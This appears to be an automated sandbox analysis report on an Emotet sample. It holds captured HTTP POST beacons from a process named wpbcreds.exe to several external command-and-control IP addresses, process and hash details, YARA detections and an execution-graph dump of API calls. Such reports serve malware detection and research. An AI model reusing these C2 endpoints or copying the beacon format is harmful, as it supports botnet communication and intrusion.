                                            Content-Length: 4660
                                            Cache-Control: no-cache


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.54991070.32.115.15780803788C:\Windows\SysWOW64\fwcfg\wpbcreds.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 11, 2024 18:20:15.394347906 CET539OUTPOST /K3KZ1n42NvAQNZg4/ HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.5
                                            Accept-Encoding: gzip, deflate
                                            DNT: 1
                                            Connection: keep-alive
                                            Referer: 70.32.115.157/K3KZ1n42NvAQNZg4/
                                            Upgrade-Insecure-Requests: 1
                                            Content-Type: multipart/form-data; boundary=--------------------cAGwb81TBde1OYDGtOza
                                            Host: 70.32.115.157:8080
                                            Content-Length: 4676
                                            Cache-Control: no-cache


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.549983111.67.12.22180803788C:\Windows\SysWOW64\fwcfg\wpbcreds.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 11, 2024 18:20:26.278662920 CET539OUTPOST /6o1iAIEQeDHOWcsR/ HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.5
                                            Accept-Encoding: gzip, deflate
                                            DNT: 1
                                            Connection: keep-alive
                                            Referer: 111.67.12.221/6o1iAIEQeDHOWcsR/
                                            Upgrade-Insecure-Requests: 1
                                            Content-Type: multipart/form-data; boundary=--------------------3PCRf3772wYwDZo4k5J9
                                            Host: 111.67.12.221:8080
                                            Content-Length: 4660
                                            Cache-Control: no-cache


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.54998498.13.75.196803788C:\Windows\SysWOW64\fwcfg\wpbcreds.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 11, 2024 18:20:30.460777998 CET626OUTPOST /H9yA2oaqlws/3MmQ3/8a6D9V6hboQjs/hy9t/w9y8YK55Q41pW7E/9tuVBGyVVtFzFYd/ HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.5
                                            Accept-Encoding: gzip, deflate
                                            DNT: 1
                                            Connection: keep-alive
                                            Referer: 98.13.75.196/H9yA2oaqlws/3MmQ3/8a6D9V6hboQjs/hy9t/w9y8YK55Q41pW7E/9tuVBGyVVtFzFYd/
                                            Upgrade-Insecure-Requests: 1
                                            Content-Type: multipart/form-data; boundary=---------------cu2hEobt4tvmI76
                                            Host: 98.13.75.196
                                            Content-Length: 4644
                                            Cache-Control: no-cache
                                            Nov 11, 2024 18:20:30.460812092 CET4644OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 75 32 68 45 6f 62 74 34 74 76 6d 49 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6e 6d 64 6c 69 75 22
                                            Data Ascii: -----------------cu2hEobt4tvmI76Content-Disposition: form-data; name="tnmdliu"; filename="skxazjtpltuwne"Content-Type: application/octet-streamEA9+bWKB1ObI$|@:\tL+f! `~ve`_*U^lnS^


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.5499855.196.35.13870803788C:\Windows\SysWOW64\fwcfg\wpbcreds.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 11, 2024 18:20:42.389178991 CET673OUTPOST /w3vsOgeeY9NPp/vwyrTa5/wI8W1JV8dTW/ZXRlXdiTaaxugNmh5/TPITs41XN0Wtx9UMJWd/VRGGqhut2ut9hId/ HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.5
                                            Accept-Encoding: gzip, deflate
                                            DNT: 1
                                            Connection: keep-alive
                                            Referer: 5.196.35.138/w3vsOgeeY9NPp/vwyrTa5/wI8W1JV8dTW/ZXRlXdiTaaxugNmh5/TPITs41XN0Wtx9UMJWd/VRGGqhut2ut9hId/
                                            Upgrade-Insecure-Requests: 1
                                            Content-Type: multipart/form-data; boundary=-----------------TO1T7raTR7e4z8n5I
                                            Host: 5.196.35.138:7080
                                            Content-Length: 4644
                                            Cache-Control: no-cache


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.54998674.58.215.226803788C:\Windows\SysWOW64\fwcfg\wpbcreds.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 11, 2024 18:20:46.470030069 CET530OUTPOST /yhwXMM7xdxH/yuXOhXg/ HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.5
                                            Accept-Encoding: gzip, deflate
                                            DNT: 1
                                            Connection: keep-alive
                                            Referer: 74.58.215.226/yhwXMM7xdxH/yuXOhXg/
                                            Upgrade-Insecure-Requests: 1
                                            Content-Type: multipart/form-data; boundary=---------------l83eJPEldOxklGM
                                            Host: 74.58.215.226
                                            Content-Length: 4644
                                            Cache-Control: no-cache
                                            Nov 11, 2024 18:20:46.470077991 CET4644OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6c 38 33 65 4a 50 45 6c 64 4f 78 6b 6c 47 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 79 65 64 69 78 65 76 6f
                                            Data Ascii: -----------------l83eJPEldOxklGMContent-Disposition: form-data; name="yedixevomlvxtjiysmn"; filename="qophcahpenisxwqoct"Content-Type: application/octet-streamnTGL&{i!t67TG$luE`zCb(5OLY>".)!


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.549989186.70.127.19980903788C:\Windows\SysWOW64\fwcfg\wpbcreds.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 11, 2024 18:20:58.462727070 CET613OUTPOST /i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/ HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.5
                                            Accept-Encoding: gzip, deflate
                                            DNT: 1
                                            Connection: keep-alive
                                            Referer: 186.70.127.199/i4y5AzbH1y3/xzjeZOG1BrwFk/qPaZcSfKDwvRvJtt9i/UXLPt3ZbVkgD/
                                            Upgrade-Insecure-Requests: 1
                                            Content-Type: multipart/form-data; boundary=---------------wFchgTxoaJDVhqc
                                            Host: 186.70.127.199:8090
                                            Content-Length: 4644
                                            Cache-Control: no-cache


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.5499901.226.84.24380803788C:\Windows\SysWOW64\fwcfg\wpbcreds.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 11, 2024 18:21:10.671874046 CET583OUTPOST /tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/ HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.5
                                            Accept-Encoding: gzip, deflate
                                            DNT: 1
                                            Connection: keep-alive
                                            Referer: 1.226.84.243/tnB9okfvyQr/ByDJryS9za6yLx/7RaIwE4xXH9a/1BG3/
                                            Upgrade-Insecure-Requests: 1
                                            Content-Type: multipart/form-data; boundary=---------------w2uEKzXy195rM91
                                            Host: 1.226.84.243:8080
                                            Content-Length: 4644
                                            Cache-Control: no-cache


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.54999112.162.84.280803788C:\Windows\SysWOW64\fwcfg\wpbcreds.exe
                                            TimestampBytes transferredDirectionData
                                            Nov 11, 2024 18:21:22.761102915 CET487OUTPOST /RzqG/ HTTP/1.1
                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                            Accept-Language: en-US,en;q=0.5
                                            Accept-Encoding: gzip, deflate
                                            DNT: 1
                                            Connection: keep-alive
                                            Referer: 12.162.84.2/RzqG/
                                            Upgrade-Insecure-Requests: 1
                                            Content-Type: multipart/form-data; boundary=--------bavvEoDq
                                            Host: 12.162.84.2:8080
                                            Content-Length: 4644
                                            Cache-Control: no-cache


                                            Click to jump to process

                                            Click to jump to process

                                            Click to jump to process

                                            Target ID:0
                                            Start time:12:19:29
                                            Start date:11/11/2024
                                            Path:C:\Users\user\Desktop\75A0VTo3z9.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\75A0VTo3z9.exe"
                                            Imagebase:0xb0000
                                            File size:117'248 bytes
                                            MD5 hash:921577C536C85169A26CAF0B69A6D82D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.2041830333.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000000.2039200708.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            Target ID:1
                                            Start time:12:19:29
                                            Start date:11/11/2024
                                            Path:C:\Windows\SysWOW64\fwcfg\wpbcreds.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\SysWOW64\fwcfg\wpbcreds.exe"
                                            Imagebase:0xb0000
                                            File size:117'248 bytes
                                            MD5 hash:921577C536C85169A26CAF0B69A6D82D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000000.2040983750.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000001.00000002.3288300959.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:6.6%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:11.4%
                                              Total number of Nodes:1022
                                              Total number of Limit Nodes:11
                                              execution_graph 6266 b1ec8 6272 b1ec2 6266->6272 6267 b2070 6268 b3d10 GetPEB 6268->6272 6269 b210d 6269->6267 6271 b4030 GetPEB 6269->6271 6270 b40d0 2 API calls 6270->6272 6271->6267 6272->6267 6272->6268 6272->6269 6272->6270 6273 b3c70 GetPEB 6272->6273 6273->6272 6274 b7c00 6282 b7c10 6274->6282 6275 b7c36 6276 b3270 GetPEB 6276->6282 6277 b7d35 6278 b36a0 4 API calls 6277->6278 6279 b7d48 6278->6279 6280 b3d10 GetPEB 6280->6282 6281 b3c70 GetPEB 6281->6282 6282->6275 6282->6276 6282->6277 6282->6280 6282->6281 5357 b6f19 5359 b6f20 5357->5359 5360 b70ac 5359->5360 5361 b6e70 GetPEB LoadLibraryW 5359->5361 5362 b6fba LoadLibraryW 5359->5362 5363 b3d10 GetPEB 5359->5363 5364 b3c70 GetPEB 5359->5364 5365 b3270 5359->5365 5361->5359 5362->5359 5363->5359 5364->5359 5367 b3293 5365->5367 5366 b32b8 5371 b3d10 GetPEB 5366->5371 5374 b32e0 5366->5374 5367->5366 5375 b3d10 GetPEB 5367->5375 5372 b32d4 5371->5372 5373 b3c70 GetPEB 5372->5373 5373->5374 5374->5359 5376 b32ac 5375->5376 5377 b3c70 5376->5377 5378 b3ccc 5377->5378 5379 b3cac 5377->5379 5378->5366 5379->5378 5380 b3d10 GetPEB 5379->5380 5383 b3f05 5379->5383 5381 b3ef9 5380->5381 5382 b3c70 GetPEB 5381->5382 5382->5383 5384 b3d10 GetPEB 5383->5384 5390 b3f36 5383->5390 5386 b3f2a 5384->5386 5385 b3c70 GetPEB 5388 b3f67 5385->5388 5389 b3c70 GetPEB 5386->5389 5387 b3f48 5387->5366 5388->5366 5389->5390 5390->5385 5390->5387 5391 b4990 5392 b49b8 5391->5392 5393 b49a2 5391->5393 5397 b49f7 CreateProcessW 5392->5397 5399 b3d10 GetPEB 5392->5399 5394 b3d10 GetPEB 5393->5394 5395 b49ac 5394->5395 5396 b3c70 GetPEB 5395->5396 5396->5392 5398 b4a93 5397->5398 5402 b4a17 5397->5402 5401 b49e6 5399->5401 5400 b4a1f 5403 b3c70 GetPEB 5401->5403 5402->5400 5404 b3d10 GetPEB 5402->5404 5407 b4a53 5402->5407 5405 b49f2 5403->5405 5406 b4a47 5404->5406 5405->5397 5408 b3c70 GetPEB 5406->5408 5409 b4a7d 5407->5409 5410 b3d10 GetPEB 5407->5410 5408->5407 5411 b4a71 5410->5411 5412 b3c70 GetPEB 5411->5412 5412->5409 5423 b40d0 5424 b40f3 5423->5424 5425 b40dd 5423->5425 5429 b4120 RtlAllocateHeap 5424->5429 5430 b3d10 GetPEB 5424->5430 5426 b3d10 GetPEB 5425->5426 5427 b40e7 5426->5427 5428 b3c70 GetPEB 5427->5428 5428->5424 5431 b410f 5430->5431 5432 b3c70 GetPEB 5431->5432 5433 b411b 5432->5433 5433->5429 5434 b5ad0 5442 b6340 5434->5442 5436 b5ad5 5437 b5af9 ExitProcess 5436->5437 5438 b3d10 GetPEB 5436->5438 5439 b5ae8 5438->5439 5440 b3c70 GetPEB 5439->5440 5441 b5af4 5440->5441 5441->5437 5485 b6361 5442->5485 5446 b3d10 GetPEB 5446->5485 5447 b6722 5447->5436 5449 b4030 GetPEB 5449->5485 5452 b6e5d 5784 bb010 5452->5784 5455 b6e43 5757 b85c0 5455->5757 5456 b69e9 GetTickCount 5456->5485 5457 b6e50 5775 b8ba0 5457->5775 5464 b3d10 GetPEB 5482 b65d6 5464->5482 5467 b6bb9 GetTickCount 5467->5485 5478 b6e48 5478->5436 5479 b6e55 5479->5436 5481 b3c70 GetPEB 5481->5485 5482->5456 5482->5464 5482->5467 5483 b3c70 GetPEB 5482->5483 5482->5485 5609 b6f10 5482->5609 5648 b9440 5482->5648 5483->5482 5485->5446 5485->5447 5485->5449 5485->5452 5485->5455 5485->5456 5485->5457 5485->5467 5485->5481 5485->5482 5487 b3f70 GetPEB 5485->5487 5488 b9680 5485->5488 5503 b8210 5485->5503 5509 b8a10 5485->5509 5519 b7e50 5485->5519 5534 b87e0 5485->5534 5546 bb160 5485->5546 5553 b5f80 5485->5553 5565 b30c0 5485->5565 5575 b1800 5485->5575 5590 b3210 5485->5590 5600 b9d50 5485->5600 5617 baf70 5485->5617 5621 b8e90 5485->5621 5635 b9e90 5485->5635 5641 b9310 5485->5641 5658 b70c0 5485->5658 5668 b8cd0 5485->5668 5677 b5e00 5485->5677 5699 b12b0 5485->5699 5719 b4580 5485->5719 5731 b7200 5485->5731 5737 b51a0 5485->5737 5742 bad80 5485->5742 5747 b90b0 5485->5747 5487->5485 5501 b96a0 5488->5501 5489 b97d0 OpenSCManagerW 5489->5501 5490 b9935 5492 b9954 5490->5492 5493 b3d10 GetPEB 5490->5493 5491 b9928 5491->5485 5799 b2e40 5492->5799 5494 b9948 5493->5494 5498 b3c70 GetPEB 5494->5498 5495 b3d10 GetPEB 5495->5501 5496 b98f6 RtlAllocateHeap 5500 b997e 5496->5500 5496->5501 5498->5492 5500->5485 5501->5489 5501->5490 5501->5491 5501->5495 5501->5496 5502 b3c70 GetPEB 5501->5502 5789 b79f0 5501->5789 5502->5501 5508 b8341 5503->5508 5504 b8440 CreateFileW 5505 b8373 5504->5505 5504->5508 5505->5485 5506 b3d10 GetPEB 5506->5508 5507 b3c70 GetPEB 5507->5508 5508->5504 5508->5505 5508->5506 5508->5507 5510 b8a24 5509->5510 5511 b8b7e 5510->5511 5512 b3270 GetPEB 5510->5512 5513 b8a4a 5510->5513 5517 b3d10 GetPEB 5510->5517 5518 b3c70 GetPEB 5510->5518 5820 b3530 5510->5820 5846 b3460 5511->5846 5512->5510 5513->5485 5516 b8b87 5516->5485 5517->5510 5518->5510 5529 b7f68 5519->5529 5520 b81b4 SetFileInformationByHandle 5520->5529 5521 b3270 GetPEB 5521->5529 5522 b81cf 5526 b81f3 CloseHandle 5522->5526 5528 b3d10 GetPEB 5522->5528 5523 b812c CreateFileW 5524 b81f6 5523->5524 5523->5529 5524->5485 5525 b80f7 5525->5485 5526->5524 5527 b3d10 GetPEB 5527->5529 5531 b81e2 5528->5531 5529->5520 5529->5521 5529->5522 5529->5523 5529->5525 5529->5527 5530 b3c70 GetPEB 5529->5530 5530->5529 5532 b3c70 GetPEB 5531->5532 5533 b81ee 5532->5533 5533->5526 5536 b8801 5534->5536 5535 b89d6 5538 b8964 5535->5538 5541 b3d10 GetPEB 5535->5541 5536->5535 5537 b3270 GetPEB 5536->5537 5536->5538 5539 b3d10 GetPEB 5536->5539 5544 b3c70 GetPEB 5536->5544 5545 b3210 GetPEB 5536->5545 5866 b4e60 5536->5866 5537->5536 5538->5485 5539->5536 5542 b89e9 5541->5542 5543 b3c70 GetPEB 5542->5543 5543->5538 5544->5536 5545->5536 5548 bb170 5546->5548 5547 bb1ea 5547->5485 5548->5547 5902 ba3f0 5548->5902 5908 ba5b0 5548->5908 5927 b9f90 5548->5927 5941 ba950 5548->5941 5563 b5fa2 5553->5563 5555 b6137 5555->5485 5556 b623b 5556->5485 5558 b4030 GetPEB 5558->5563 5559 b3d10 GetPEB 5562 b61d1 5559->5562 5560 b3d10 GetPEB 5560->5563 5561 b3c70 GetPEB 5561->5562 5562->5556 5562->5559 5562->5561 5563->5555 5563->5558 5563->5560 5563->5562 5564 b3c70 GetPEB 5563->5564 6051 b5380 5563->6051 6060 b4aa0 5563->6060 5564->5563 5566 b30fa 5565->5566 5567 b311f 5566->5567 5568 b3d10 GetPEB 5566->5568 5571 b3d10 GetPEB 5567->5571 5574 b3147 5567->5574 5569 b3113 5568->5569 5570 b3c70 GetPEB 5569->5570 5570->5567 5572 b313b 5571->5572 5573 b3c70 GetPEB 5572->5573 5573->5574 5574->5485 5576 b180c 5575->5576 5579 b1822 5575->5579 5577 b3d10 GetPEB 5576->5577 5578 b1816 5577->5578 5580 b3c70 GetPEB 5578->5580 5581 b3d10 GetPEB 5579->5581 5585 b184b 5579->5585 5580->5579 5582 b183f 5581->5582 5584 b3c70 GetPEB 5582->5584 5583 b18ae 5583->5485 5584->5585 5585->5583 5585->5585 6069 b2470 5585->6069 5587 b1898 5588 b189c 5587->5588 5589 b4030 GetPEB 5587->5589 5588->5485 5589->5583 5591 b321d 5590->5591 5594 b3233 5590->5594 5592 b3d10 GetPEB 5591->5592 5593 b3227 5592->5593 5595 b3c70 GetPEB 5593->5595 5596 b325b 5594->5596 5597 b3d10 GetPEB 5594->5597 5595->5594 5596->5485 5598 b324f 5597->5598 5599 b3c70 GetPEB 5598->5599 5599->5596 5603 b9d60 5600->5603 5601 b9e3f 5602 b3d10 GetPEB 5601->5602 5606 b9df5 5601->5606 5604 b9e52 5602->5604 5603->5601 5603->5606 5607 b3c70 GetPEB 5603->5607 5608 b3d10 GetPEB 5603->5608 5605 b3c70 GetPEB 5604->5605 5605->5606 5606->5485 5607->5603 5608->5603 5611 b6f20 5609->5611 5610 b3270 GetPEB 5610->5611 5611->5610 5612 b70ac 5611->5612 5613 b6e70 GetPEB LoadLibraryW 5611->5613 5614 b6fba LoadLibraryW 5611->5614 5615 b3d10 GetPEB 5611->5615 5616 b3c70 GetPEB 5611->5616 5612->5482 5613->5611 5614->5611 5615->5611 5616->5611 5619 baf78 5617->5619 5618 bafe6 5618->5485 5619->5618 5620 b40d0 2 API calls 5619->5620 5620->5619 5629 b8eb0 5621->5629 5622 b8fd1 5622->5485 5623 b9065 5630 b3d10 GetPEB 5623->5630 5631 b908d 5623->5631 5624 b902a 5624->5623 5625 b3d10 GetPEB 5624->5625 5627 b9059 5625->5627 5626 b3c70 GetPEB 5626->5629 5628 b3c70 GetPEB 5627->5628 5628->5623 5629->5622 5629->5624 5629->5626 5634 b3d10 GetPEB 5629->5634 5632 b9081 5630->5632 5631->5485 5633 b3c70 GetPEB 5632->5633 5633->5631 5634->5629 5636 b9e9c 5635->5636 5640 b9eb2 5635->5640 5637 b3d10 GetPEB 5636->5637 5638 b9ea6 5637->5638 5639 b3c70 GetPEB 5638->5639 5639->5640 5640->5485 5645 b9330 5641->5645 5642 b4aa0 GetPEB 5642->5645 5643 b3d10 GetPEB 5643->5645 5644 b93d3 5644->5485 5645->5642 5645->5643 5645->5644 5647 b3c70 GetPEB 5645->5647 6078 b44d0 5645->6078 5647->5645 5657 b9450 5648->5657 5649 b964d 5650 b3530 GetPEB 5649->5650 5652 b965d 5650->5652 5651 b9642 5651->5482 5652->5482 5653 b3270 GetPEB 5653->5657 5654 b3d10 GetPEB 5654->5657 5655 b94fb GetTickCount GetCurrentProcessId _snwprintf 5655->5657 5656 b3c70 GetPEB 5656->5657 5657->5649 5657->5651 5657->5653 5657->5654 5657->5655 5657->5656 5659 b70c9 5658->5659 5660 b70df 5658->5660 5661 b3d10 GetPEB 5659->5661 5664 b7108 5660->5664 5665 b3d10 GetPEB 5660->5665 5662 b70d3 5661->5662 5663 b3c70 GetPEB 5662->5663 5663->5660 5664->5485 5666 b70fc 5665->5666 5667 b3c70 GetPEB 5666->5667 5667->5664 5669 b8cf0 5668->5669 5670 b8e56 5669->5670 5671 b3d10 GetPEB 5669->5671 5672 b8d1d 5669->5672 5674 b3c70 GetPEB 5669->5674 5670->5672 5673 b3d10 GetPEB 5670->5673 5671->5669 5672->5485 5675 b8e69 5673->5675 5674->5669 5676 b3c70 GetPEB 5675->5676 5676->5672 5682 b5e13 5677->5682 5678 b5ec5 6093 b3370 5678->6093 5679 b5ebe 5679->5485 5680 b3d10 GetPEB 5680->5682 5682->5678 5682->5679 5682->5680 5684 b3c70 GetPEB 5682->5684 5683 b5ed1 5685 b5ef3 5683->5685 5686 b3d10 GetPEB 5683->5686 5684->5682 6103 b52d0 5685->6103 5688 b5ee7 5686->5688 5690 b3c70 GetPEB 5688->5690 5690->5685 5691 b5f35 5694 b5f5d 5691->5694 5696 b3d10 GetPEB 5691->5696 5692 b3d10 GetPEB 5693 b5f29 5692->5693 5695 b3c70 GetPEB 5693->5695 5694->5485 5695->5691 5697 b5f51 5696->5697 5698 b3c70 GetPEB 5697->5698 5698->5694 5717 b12e1 5699->5717 5701 b40d0 GetPEB RtlAllocateHeap 5701->5717 5704 b3d10 GetPEB 5704->5717 5707 b14c0 5707->5485 5708 b17e6 5712 b4030 GetPEB 5708->5712 5711 b4030 GetPEB 5711->5717 5712->5707 5713 b3c70 GetPEB 5713->5717 5715 b3270 GetPEB 5715->5717 5717->5701 5717->5704 5717->5707 5717->5708 5717->5711 5717->5713 5717->5715 5718 b3210 GetPEB 5717->5718 6113 b3f70 5717->6113 6119 b1be0 5717->6119 6135 b59f0 5717->6135 6154 b1db0 5717->6154 6162 b1eb0 5717->6162 6170 b2130 5717->6170 6179 b2a30 5717->6179 6195 b18c0 5717->6195 6218 b4cc0 5717->6218 5718->5717 5720 b45ab 5719->5720 5721 b4595 5719->5721 5723 b45db GetCurrentProcessId 5720->5723 5725 b3d10 GetPEB 5720->5725 5722 b3d10 GetPEB 5721->5722 5724 b459f 5722->5724 5726 b45e5 5723->5726 5727 b3c70 GetPEB 5724->5727 5728 b45c7 5725->5728 5726->5485 5727->5720 5729 b3c70 GetPEB 5728->5729 5730 b45d3 5729->5730 5730->5723 5735 b7210 5731->5735 5732 b73ce 5732->5485 5733 b4df0 GetPEB 5733->5735 5734 b3c70 GetPEB 5734->5735 5735->5732 5735->5733 5735->5734 5736 b3d10 GetPEB 5735->5736 5736->5735 5740 b51b0 5737->5740 5738 b5262 5738->5485 5739 b3d10 GetPEB 5739->5740 5740->5738 5740->5739 5741 b3c70 GetPEB 5740->5741 5741->5740 5743 bad98 5742->5743 5745 baea1 5742->5745 5744 b3d10 GetPEB 5743->5744 5743->5745 5746 b3c70 GetPEB 5743->5746 5744->5743 5745->5485 5746->5743 5755 b90ca 5747->5755 5748 b92d3 5749 b3d10 GetPEB 5748->5749 5751 b9277 5748->5751 5750 b92e6 5749->5750 5752 b3c70 GetPEB 5750->5752 5751->5485 5752->5751 5753 b3d10 GetPEB 5753->5755 5755->5748 5755->5751 5755->5753 5756 b3c70 GetPEB 5755->5756 6245 b1000 5755->6245 5756->5755 5764 b85d3 5757->5764 5758 b8cd0 GetPEB 5758->5764 5759 b85fc 5759->5478 5760 b3d10 GetPEB 5760->5764 5761 b3270 GetPEB 5761->5764 5762 b8771 5765 b3d10 GetPEB 5762->5765 5771 b8790 5762->5771 5764->5758 5764->5759 5764->5760 5764->5761 5764->5762 5767 b3c70 GetPEB 5764->5767 5769 b3530 GetPEB 5764->5769 6254 b74c0 5764->6254 5766 b8784 5765->5766 5770 b3c70 GetPEB 5766->5770 5767->5764 5768 b87c3 5768->5478 5769->5764 5770->5771 5771->5768 5772 b3d10 GetPEB 5771->5772 5773 b87b7 5772->5773 5774 b3c70 GetPEB 5773->5774 5774->5768 5781 b8bb0 5775->5781 5776 b3270 GetPEB 5776->5781 5777 b8c8d 5778 b4990 2 API calls 5777->5778 5779 b8c9d 5778->5779 5779->5479 5780 b8bd7 5780->5479 5781->5776 5781->5777 5781->5780 5782 b3d10 GetPEB 5781->5782 5783 b3c70 GetPEB 5781->5783 5782->5781 5783->5781 5785 bb01c 5784->5785 5786 b3c70 GetPEB 5785->5786 5787 bb152 5785->5787 5788 b3d10 GetPEB 5785->5788 5786->5785 5787->5447 5788->5785 5794 b7a10 5789->5794 5790 b7b70 5790->5501 5791 b3d10 GetPEB 5791->5794 5792 b7bcc 5792->5501 5793 b7bad 5793->5792 5795 b3d10 GetPEB 5793->5795 5794->5790 5794->5791 5794->5793 5797 b3c70 GetPEB 5794->5797 5796 b7bc0 5795->5796 5798 b3c70 GetPEB 5796->5798 5797->5794 5798->5792 5800 b2e50 5799->5800 5802 b2e7a 5800->5802 5804 b36a0 5800->5804 5802->5500 5803 b2e92 5803->5500 5806 b36c0 5804->5806 5805 b396f 5809 b3993 FindClose 5805->5809 5813 b3d10 GetPEB 5805->5813 5806->5805 5807 b3270 GetPEB 5806->5807 5808 b3839 5806->5808 5810 b3751 FindFirstFileW 5806->5810 5812 b3715 FindNextFileW 5806->5812 5816 b3c70 GetPEB 5806->5816 5818 b36a0 GetPEB 5806->5818 5819 b3d10 GetPEB 5806->5819 5807->5806 5808->5803 5811 b3996 5809->5811 5810->5806 5810->5811 5811->5803 5812->5806 5814 b3982 5813->5814 5815 b3c70 GetPEB 5814->5815 5817 b398e 5815->5817 5816->5806 5817->5809 5818->5806 5819->5806 5821 b3545 5820->5821 5824 b355b 5820->5824 5822 b3d10 GetPEB 5821->5822 5823 b354f 5822->5823 5826 b3c70 GetPEB 5823->5826 5825 b358d 5824->5825 5827 b3d10 GetPEB 5824->5827 5830 b35c2 5825->5830 5831 b3d10 GetPEB 5825->5831 5826->5824 5828 b3581 5827->5828 5829 b3c70 GetPEB 5828->5829 5829->5825 5833 b35fa 5830->5833 5835 b3d10 GetPEB 5830->5835 5832 b35b6 5831->5832 5834 b3c70 GetPEB 5832->5834 5838 b3626 5833->5838 5839 b3d10 GetPEB 5833->5839 5834->5830 5836 b35ee 5835->5836 5837 b3c70 GetPEB 5836->5837 5837->5833 5841 b367c 5838->5841 5843 b3d10 GetPEB 5838->5843 5840 b361a 5839->5840 5842 b3c70 GetPEB 5840->5842 5841->5510 5842->5838 5844 b3670 5843->5844 5845 b3c70 GetPEB 5844->5845 5845->5841 5847 b3270 GetPEB 5846->5847 5848 b3474 5847->5848 5849 b3495 5848->5849 5850 b3d10 GetPEB 5848->5850 5853 b34ca 5849->5853 5854 b3d10 GetPEB 5849->5854 5851 b3489 5850->5851 5852 b3c70 GetPEB 5851->5852 5852->5849 5857 b34f2 5853->5857 5858 b3d10 GetPEB 5853->5858 5855 b34be 5854->5855 5856 b3c70 GetPEB 5855->5856 5856->5853 5861 b3523 DeleteFileW 5857->5861 5862 b3d10 GetPEB 5857->5862 5859 b34e6 5858->5859 5860 b3c70 GetPEB 5859->5860 5860->5857 5861->5516 5863 b3512 5862->5863 5864 b3c70 GetPEB 5863->5864 5865 b351e 5864->5865 5865->5861 5879 